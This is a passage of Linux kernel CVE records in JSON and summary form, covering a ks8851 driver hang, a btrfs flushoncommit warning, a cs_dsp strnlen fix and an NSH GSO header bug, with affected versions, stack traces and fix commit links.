"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.28",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.87",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.28",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.7",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: ks8851: Handle softirqs at the end of IRQ thread to fix hang\n\nThe ks8851_irq() thread may call ks8851_rx_pkts() in case there are\nany packets in the MAC FIFO, which calls netif_rx(). This netif_rx()\nimplementation is guarded by local_bh_disable() and local_bh_enable().\nThe local_bh_enable() may call do_softirq() to run softirqs in case\nany are pending. One of the softirqs is net_rx_action, which ultimately\nreaches the driver .start_xmit callback. If that happens, the system\nhangs. The entire call chain is below:\n\nks8851_start_xmit_par from netdev_start_xmit\nnetdev_start_xmit from dev_hard_start_xmit\ndev_hard_start_xmit from sch_direct_xmit\nsch_direct_xmit from __dev_queue_xmit\n__dev_queue_xmit from __neigh_update\n__neigh_update from neigh_update\nneigh_update from arp_process.constprop.0\narp_process.constprop.0 from __netif_receive_skb_one_core\n__netif_receive_skb_one_core from process_backlog\nprocess_backlog from __napi_poll.constprop.0\n__napi_poll.constprop.0 from net_rx_action\nnet_rx_action from __do_softirq\n__do_softirq from call_with_stack\ncall_with_stack from do_softirq\ndo_softirq from __local_bh_enable_ip\n__local_bh_enable_ip from netif_rx\nnetif_rx from ks8851_irq\nks8851_irq from irq_thread_fn\nirq_thread_fn from irq_thread\nirq_thread from kthread\nkthread from ret_from_fork\n\nThe hang happens because ks8851_irq() first locks a spinlock in\nks8851_par.c ks8851_lock_par() spin_lock_irqsave(\u0026ksp-\u003elock, ...)\nand with that spinlock locked, calls netif_rx(). Once the execution\nreaches ks8851_start_xmit_par(), it calls ks8851_lock_par() again\nwhich attempts to claim the already locked spinlock again, and the\nhang happens.\n\nMove the do_softirq() call outside of the spinlock protected section\nof ks8851_irq() by disabling BHs around the entire spinlock protected\nsection of ks8851_irq() handler. Place local_bh_enable() outside of\nthe spinlock protected section, so that it can trigger do_softirq()\nwithout the ks8851_par.c ks8851_lock_par() spinlock being held, and\nsafely call ks8851_start_xmit_par() without attempting to lock the\nalready locked spinlock.\n\nSince ks8851_irq() is protected by local_bh_disable()/local_bh_enable()\nnow, replace netif_rx() with __netif_rx() which is not duplicating the\nlocal_bh_disable()/local_bh_enable() calls."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:09:30.620Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/492337a4fbd1421b42df684ee9b34be2a2722540"
},
{
"url": "https://git.kernel.org/stable/c/cba376eb036c2c20077b41d47b317d8218fe754f"
},
{
"url": "https://git.kernel.org/stable/c/49d5d70538b6b8f2a3f8f1ac30c1f921d4a0929b"
},
{
"url": "https://git.kernel.org/stable/c/be0384bf599cf1eb8d337517feeb732d71f75a6f"
}
],
"title": "net: ks8851: Handle softirqs at the end of IRQ thread to fix hang",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35971",
"datePublished": "2024-05-20T09:41:59.174Z",
"dateReserved": "2024-05-17T13:50:33.141Z",
"dateUpdated": "2025-05-04T09:09:30.620Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48920 (GCVE-0-2022-48920)
Vulnerability from cvelistv5
Published
2024-08-22 01:32
Modified
2025-05-04 08:26
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
btrfs: get rid of warning on transaction commit when using flushoncommit
When using the flushoncommit mount option, during almost every transaction
commit we trigger a warning from __writeback_inodes_sb_nr():
$ cat fs/fs-writeback.c:
(...)
static void __writeback_inodes_sb_nr(struct super_block *sb, ...
{
(...)
WARN_ON(!rwsem_is_locked(&sb->s_umount));
(...)
}
(...)
The trace produced in dmesg looks like the following:
[947.473890] WARNING: CPU: 5 PID: 930 at fs/fs-writeback.c:2610 __writeback_inodes_sb_nr+0x7e/0xb3
[947.481623] Modules linked in: nfsd nls_cp437 cifs asn1_decoder cifs_arc4 fscache cifs_md4 ipmi_ssif
[947.489571] CPU: 5 PID: 930 Comm: btrfs-transacti Not tainted 95.16.3-srb-asrock-00001-g36437ad63879 #186
[947.497969] RIP: 0010:__writeback_inodes_sb_nr+0x7e/0xb3
[947.502097] Code: 24 10 4c 89 44 24 18 c6 (...)
[947.519760] RSP: 0018:ffffc90000777e10 EFLAGS: 00010246
[947.523818] RAX: 0000000000000000 RBX: 0000000000963300 RCX: 0000000000000000
[947.529765] RDX: 0000000000000000 RSI: 000000000000fa51 RDI: ffffc90000777e50
[947.535740] RBP: ffff888101628a90 R08: ffff888100955800 R09: ffff888100956000
[947.541701] R10: 0000000000000002 R11: 0000000000000001 R12: ffff888100963488
[947.547645] R13: ffff888100963000 R14: ffff888112fb7200 R15: ffff888100963460
[947.553621] FS: 0000000000000000(0000) GS:ffff88841fd40000(0000) knlGS:0000000000000000
[947.560537] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[947.565122] CR2: 0000000008be50c4 CR3: 000000000220c000 CR4: 00000000001006e0
[947.571072] Call Trace:
[947.572354] <TASK>
[947.573266] btrfs_commit_transaction+0x1f1/0x998
[947.576785] ? start_transaction+0x3ab/0x44e
[947.579867] ? schedule_timeout+0x8a/0xdd
[947.582716] transaction_kthread+0xe9/0x156
[947.585721] ? btrfs_cleanup_transaction.isra.0+0x407/0x407
[947.590104] kthread+0x131/0x139
[947.592168] ? set_kthread_struct+0x32/0x32
[947.595174] ret_from_fork+0x22/0x30
[947.597561] </TASK>
[947.598553] ---[ end trace 644721052755541c ]---
This is because we started using writeback_inodes_sb() to flush delalloc
when committing a transaction (when using -o flushoncommit), in order to
avoid deadlocks with filesystem freeze operations. This change was made
by commit ce8ea7cc6eb313 ("btrfs: don't call btrfs_start_delalloc_roots
in flushoncommit"). After that change we started producing that warning,
and every now and then a user reports this since the warning happens too
often, it spams dmesg/syslog, and a user is unsure if this reflects any
problem that might compromise the filesystem's reliability.
We can not just lock the sb->s_umount semaphore before calling
writeback_inodes_sb(), because that would at least deadlock with
filesystem freezing, since at fs/super.c:freeze_super() sync_filesystem()
is called while we are holding that semaphore in write mode, and that can
trigger a transaction commit, resulting in a deadlock. It would also
trigger the same type of deadlock in the unmount path. Possibly, it could
also introduce some other locking dependencies that lockdep would report.
To fix this call try_to_writeback_inodes_sb() instead of
writeback_inodes_sb(), because that will try to read lock sb->s_umount
and then will only call writeback_inodes_sb() if it was able to lock it.
This is fine because the cases where it can't read lock sb->s_umount
are during a filesystem unmount or during a filesystem freeze - in those
cases sb->s_umount is write locked and sync_filesystem() is called, which
calls writeback_inodes_sb(). In other words, in all cases where we can't
take a read lock on sb->s_umount, writeback is already being triggered
elsewhere.
An alternative would be to call btrfs_start_delalloc_roots() with a
number of pages different from LONG_MAX, for example matching the number
of delalloc bytes we currently have, in
---truncated---
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48920",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:33:31.693996Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:01.186Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/btrfs/transaction.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "850a77c999b81dd2724efd2684068d6f90db8c16",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "e4d044dbffcd570351f21c747fc77ff90aed7f2e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "a0f0cf8341e34e5d2265bfd3a7ad68342da1e2aa",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/btrfs/transaction.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.27",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.13",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.27",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: get rid of warning on transaction commit when using flushoncommit\n\nWhen using the flushoncommit mount option, during almost every transaction\ncommit we trigger a warning from __writeback_inodes_sb_nr():\n\n $ cat fs/fs-writeback.c:\n (...)\n static void __writeback_inodes_sb_nr(struct super_block *sb, ...\n {\n (...)\n WARN_ON(!rwsem_is_locked(\u0026sb-\u003es_umount));\n (...)\n }\n (...)\n\nThe trace produced in dmesg looks like the following:\n\n [947.473890] WARNING: CPU: 5 PID: 930 at fs/fs-writeback.c:2610 __writeback_inodes_sb_nr+0x7e/0xb3\n [947.481623] Modules linked in: nfsd nls_cp437 cifs asn1_decoder cifs_arc4 fscache cifs_md4 ipmi_ssif\n [947.489571] CPU: 5 PID: 930 Comm: btrfs-transacti Not tainted 95.16.3-srb-asrock-00001-g36437ad63879 #186\n [947.497969] RIP: 0010:__writeback_inodes_sb_nr+0x7e/0xb3\n [947.502097] Code: 24 10 4c 89 44 24 18 c6 (...)\n [947.519760] RSP: 0018:ffffc90000777e10 EFLAGS: 00010246\n [947.523818] RAX: 0000000000000000 RBX: 0000000000963300 RCX: 0000000000000000\n [947.529765] RDX: 0000000000000000 RSI: 000000000000fa51 RDI: ffffc90000777e50\n [947.535740] RBP: ffff888101628a90 R08: ffff888100955800 R09: ffff888100956000\n [947.541701] R10: 0000000000000002 R11: 0000000000000001 R12: ffff888100963488\n [947.547645] R13: ffff888100963000 R14: ffff888112fb7200 R15: ffff888100963460\n [947.553621] FS: 0000000000000000(0000) GS:ffff88841fd40000(0000) knlGS:0000000000000000\n [947.560537] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n [947.565122] CR2: 0000000008be50c4 CR3: 000000000220c000 CR4: 00000000001006e0\n [947.571072] Call Trace:\n [947.572354] \u003cTASK\u003e\n [947.573266] btrfs_commit_transaction+0x1f1/0x998\n [947.576785] ? start_transaction+0x3ab/0x44e\n [947.579867] ? schedule_timeout+0x8a/0xdd\n [947.582716] transaction_kthread+0xe9/0x156\n [947.585721] ? btrfs_cleanup_transaction.isra.0+0x407/0x407\n [947.590104] kthread+0x131/0x139\n [947.592168] ? set_kthread_struct+0x32/0x32\n [947.595174] ret_from_fork+0x22/0x30\n [947.597561] \u003c/TASK\u003e\n [947.598553] ---[ end trace 644721052755541c ]---\n\nThis is because we started using writeback_inodes_sb() to flush delalloc\nwhen committing a transaction (when using -o flushoncommit), in order to\navoid deadlocks with filesystem freeze operations. This change was made\nby commit ce8ea7cc6eb313 (\"btrfs: don\u0027t call btrfs_start_delalloc_roots\nin flushoncommit\"). After that change we started producing that warning,\nand every now and then a user reports this since the warning happens too\noften, it spams dmesg/syslog, and a user is unsure if this reflects any\nproblem that might compromise the filesystem\u0027s reliability.\n\nWe can not just lock the sb-\u003es_umount semaphore before calling\nwriteback_inodes_sb(), because that would at least deadlock with\nfilesystem freezing, since at fs/super.c:freeze_super() sync_filesystem()\nis called while we are holding that semaphore in write mode, and that can\ntrigger a transaction commit, resulting in a deadlock. It would also\ntrigger the same type of deadlock in the unmount path. Possibly, it could\nalso introduce some other locking dependencies that lockdep would report.\n\nTo fix this call try_to_writeback_inodes_sb() instead of\nwriteback_inodes_sb(), because that will try to read lock sb-\u003es_umount\nand then will only call writeback_inodes_sb() if it was able to lock it.\nThis is fine because the cases where it can\u0027t read lock sb-\u003es_umount\nare during a filesystem unmount or during a filesystem freeze - in those\ncases sb-\u003es_umount is write locked and sync_filesystem() is called, which\ncalls writeback_inodes_sb(). In other words, in all cases where we can\u0027t\ntake a read lock on sb-\u003es_umount, writeback is already being triggered\nelsewhere.\n\nAn alternative would be to call btrfs_start_delalloc_roots() with a\nnumber of pages different from LONG_MAX, for example matching the number\nof delalloc bytes we currently have, in \n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:26:07.540Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/850a77c999b81dd2724efd2684068d6f90db8c16"
},
{
"url": "https://git.kernel.org/stable/c/e4d044dbffcd570351f21c747fc77ff90aed7f2e"
},
{
"url": "https://git.kernel.org/stable/c/a0f0cf8341e34e5d2265bfd3a7ad68342da1e2aa"
}
],
"title": "btrfs: get rid of warning on transaction commit when using flushoncommit",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48920",
"datePublished": "2024-08-22T01:32:50.796Z",
"dateReserved": "2024-08-21T06:06:23.295Z",
"dateUpdated": "2025-05-04T08:26:07.540Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-41056 (GCVE-0-2024-41056)
Vulnerability from cvelistv5
Published
2024-07-29 14:33
Modified
2025-05-04 09:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
firmware: cs_dsp: Use strnlen() on name fields in V1 wmfw files
Use strnlen() instead of strlen() on the algorithm and coefficient name
string arrays in V1 wmfw files.
In V1 wmfw files the name is a NUL-terminated string in a fixed-size
array. cs_dsp should protect against overrunning the array if the NUL
terminator is missing.
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:46:51.164Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/16d76857d6b5426f41b587d0bb925de3f25bfb21"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/392cff2f86a25a4286ff3151c7739143c61c1781"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/53a9f8cdbf35a682e9894e1a606f4640e5359185"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/680e126ec0400f6daecf0510c5bb97a55779ff03"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-41056",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:22:25.022416Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:01.793Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/firmware/cirrus/cs_dsp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "16d76857d6b5426f41b587d0bb925de3f25bfb21",
"status": "affected",
"version": "f6bc909e7673c30abcbdb329e7d0aa2e83c103d7",
"versionType": "git"
},
{
"lessThan": "392cff2f86a25a4286ff3151c7739143c61c1781",
"status": "affected",
"version": "f6bc909e7673c30abcbdb329e7d0aa2e83c103d7",
"versionType": "git"
},
{
"lessThan": "53a9f8cdbf35a682e9894e1a606f4640e5359185",
"status": "affected",
"version": "f6bc909e7673c30abcbdb329e7d0aa2e83c103d7",
"versionType": "git"
},
{
"lessThan": "680e126ec0400f6daecf0510c5bb97a55779ff03",
"status": "affected",
"version": "f6bc909e7673c30abcbdb329e7d0aa2e83c103d7",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/firmware/cirrus/cs_dsp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.16"
},
{
"lessThan": "5.16",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.100",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.41",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.100",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.41",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.10",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "5.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfirmware: cs_dsp: Use strnlen() on name fields in V1 wmfw files\n\nUse strnlen() instead of strlen() on the algorithm and coefficient name\nstring arrays in V1 wmfw files.\n\nIn V1 wmfw files the name is a NUL-terminated string in a fixed-size\narray. cs_dsp should protect against overrunning the array if the NUL\nterminator is missing."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:21:06.418Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/16d76857d6b5426f41b587d0bb925de3f25bfb21"
},
{
"url": "https://git.kernel.org/stable/c/392cff2f86a25a4286ff3151c7739143c61c1781"
},
{
"url": "https://git.kernel.org/stable/c/53a9f8cdbf35a682e9894e1a606f4640e5359185"
},
{
"url": "https://git.kernel.org/stable/c/680e126ec0400f6daecf0510c5bb97a55779ff03"
}
],
"title": "firmware: cs_dsp: Use strnlen() on name fields in V1 wmfw files",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-41056",
"datePublished": "2024-07-29T14:33:27.453Z",
"dateReserved": "2024-07-12T12:17:45.627Z",
"dateUpdated": "2025-05-04T09:21:06.418Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36933 (GCVE-0-2024-36933)
Vulnerability from cvelistv5
Published
2024-05-30 15:29
Modified
2025-05-04 09:12
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
nsh: Restore skb->{protocol,data,mac_header} for outer header in nsh_gso_segment().
syzbot triggered various splats (see [0] and links) by a crafted GSO
packet of VIRTIO_NET_HDR_GSO_UDP layering the following protocols:
ETH_P_8021AD + ETH_P_NSH + ETH_P_IPV6 + IPPROTO_UDP
NSH can encapsulate IPv4, IPv6, Ethernet, NSH, and MPLS. As the inner
protocol can be Ethernet, NSH GSO handler, nsh_gso_segment(), calls
skb_mac_gso_segment() to invoke inner protocol GSO handlers.
nsh_gso_segment() does the following for the original skb before
calling skb_mac_gso_segment()
1. reset skb->network_header
2. save the original skb->{mac_heaeder,mac_len} in a local variable
3. pull the NSH header
4. resets skb->mac_header
5. set up skb->mac_len and skb->protocol for the inner protocol.
and does the following for the segmented skb
6. set ntohs(ETH_P_NSH) to skb->protocol
7. push the NSH header
8. restore skb->mac_header
9. set skb->mac_header + mac_len to skb->network_header
10. restore skb->mac_len
There are two problems in 6-7 and 8-9.
(a)
After 6 & 7, skb->data points to the NSH header, so the outer header
(ETH_P_8021AD in this case) is stripped when skb is sent out of netdev.
Also, if NSH is encapsulated by NSH + Ethernet (so NSH-Ethernet-NSH),
skb_pull() in the first nsh_gso_segment() will make skb->data point
to the middle of the outer NSH or Ethernet header because the Ethernet
header is not pulled by the second nsh_gso_segment().
(b)
While restoring skb->{mac_header,network_header} in 8 & 9,
nsh_gso_segment() does not assume that the data in the linear
buffer is shifted.
However, udp6_ufo_fragment() could shift the data and change
skb->mac_header accordingly as demonstrated by syzbot.
If this happens, even the restored skb->mac_header points to
the middle of the outer header.
It seems nsh_gso_segment() has never worked with outer headers so far.
At the end of nsh_gso_segment(), the outer header must be restored for
the segmented skb, instead of the NSH header.
To do that, let's calculate the outer header position relatively from
the inner header and set skb->{data,mac_header,protocol} properly.
[0]:
BUG: KMSAN: uninit-value in ipvlan_process_outbound drivers/net/ipvlan/ipvlan_core.c:524 [inline]
BUG: KMSAN: uninit-value in ipvlan_xmit_mode_l3 drivers/net/ipvlan/ipvlan_core.c:602 [inline]
BUG: KMSAN: uninit-value in ipvlan_queue_xmit+0xf44/0x16b0 drivers/net/ipvlan/ipvlan_core.c:668
ipvlan_process_outbound drivers/net/ipvlan/ipvlan_core.c:524 [inline]
ipvlan_xmit_mode_l3 drivers/net/ipvlan/ipvlan_core.c:602 [inline]
ipvlan_queue_xmit+0xf44/0x16b0 drivers/net/ipvlan/ipvlan_core.c:668
ipvlan_start_xmit+0x5c/0x1a0 drivers/net/ipvlan/ipvlan_main.c:222
__netdev_start_xmit include/linux/netdevice.h:4989 [inline]
netdev_start_xmit include/linux/netdevice.h:5003 [inline]
xmit_one net/core/dev.c:3547 [inline]
dev_hard_start_xmit+0x244/0xa10 net/core/dev.c:3563
__dev_queue_xmit+0x33ed/0x51c0 net/core/dev.c:4351
dev_queue_xmit include/linux/netdevice.h:3171 [inline]
packet_xmit+0x9c/0x6b0 net/packet/af_packet.c:276
packet_snd net/packet/af_packet.c:3081 [inline]
packet_sendmsg+0x8aef/0x9f10 net/packet/af_packet.c:3113
sock_sendmsg_nosec net/socket.c:730 [inline]
__sock_sendmsg net/socket.c:745 [inline]
__sys_sendto+0x735/0xa10 net/socket.c:2191
__do_sys_sendto net/socket.c:2203 [inline]
__se_sys_sendto net/socket.c:2199 [inline]
__x64_sys_sendto+0x125/0x1c0 net/socket.c:2199
do_syscall_x64 arch/x86/entry/common.c:52 [inline]
do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83
entry_SYSCALL_64_after_hwframe+0x63/0x6b
Uninit was created at:
slab_post_alloc_hook mm/slub.c:3819 [inline]
slab_alloc_node mm/slub.c:3860 [inline]
__do_kmalloc_node mm/slub.c:3980 [inline]
__kmalloc_node_track_caller+0x705/0x1000 mm/slub.c:4001
kmalloc_reserve+0x249/0x4a0 net/core/skbuff.c:582
__
---truncated---
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: c411ed854584a71b0e86ac3019b60e4789d88086 Version: c411ed854584a71b0e86ac3019b60e4789d88086 Version: c411ed854584a71b0e86ac3019b60e4789d88086 Version: c411ed854584a71b0e86ac3019b60e4789d88086 Version: c411ed854584a71b0e86ac3019b60e4789d88086 Version: c411ed854584a71b0e86ac3019b60e4789d88086 Version: c411ed854584a71b0e86ac3019b60e4789d88086 Version: c411ed854584a71b0e86ac3019b60e4789d88086 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-36933",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-04T15:40:25.095830Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:47:53.616Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-09-12T16:02:59.824Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a7c2c3c1caabcb4a3d6c47284c397507aaf54fe9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/46134031c20fd313d03b90169d64b2e05ca6b65c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bbccf0caef2fa917d6d0692385a06ce3c262a216"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5a4603fbc285752d19e4b415466db18ef3617e4a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/37ed6f244ec5bda2e90b085084e322ea55d0aaa2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/696d18bb59727a2e0526c0802a812620be1c9340"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/29a07f2ee4d273760c2acbfc756e29eccd82470a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4b911a9690d72641879ea6d13cce1de31d346d79"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20240912-0006/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/nsh/nsh.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "a7c2c3c1caabcb4a3d6c47284c397507aaf54fe9",
"status": "affected",
"version": "c411ed854584a71b0e86ac3019b60e4789d88086",
"versionType": "git"
},
{
"lessThan": "46134031c20fd313d03b90169d64b2e05ca6b65c",
"status": "affected",
"version": "c411ed854584a71b0e86ac3019b60e4789d88086",
"versionType": "git"
},
{
"lessThan": "bbccf0caef2fa917d6d0692385a06ce3c262a216",
"status": "affected",
"version": "c411ed854584a71b0e86ac3019b60e4789d88086",
"versionType": "git"
},
{
"lessThan": "5a4603fbc285752d19e4b415466db18ef3617e4a",
"status": "affected",
"version": "c411ed854584a71b0e86ac3019b60e4789d88086",
"versionType": "git"
},
{
"lessThan": "37ed6f244ec5bda2e90b085084e322ea55d0aaa2",
"status": "affected",
"version": "c411ed854584a71b0e86ac3019b60e4789d88086",
"versionType": "git"
},
{
"lessThan": "696d18bb59727a2e0526c0802a812620be1c9340",
"status": "affected",
"version": "c411ed854584a71b0e86ac3019b60e4789d88086",
"versionType": "git"
},
{
"lessThan": "29a07f2ee4d273760c2acbfc756e29eccd82470a",
"status": "affected",
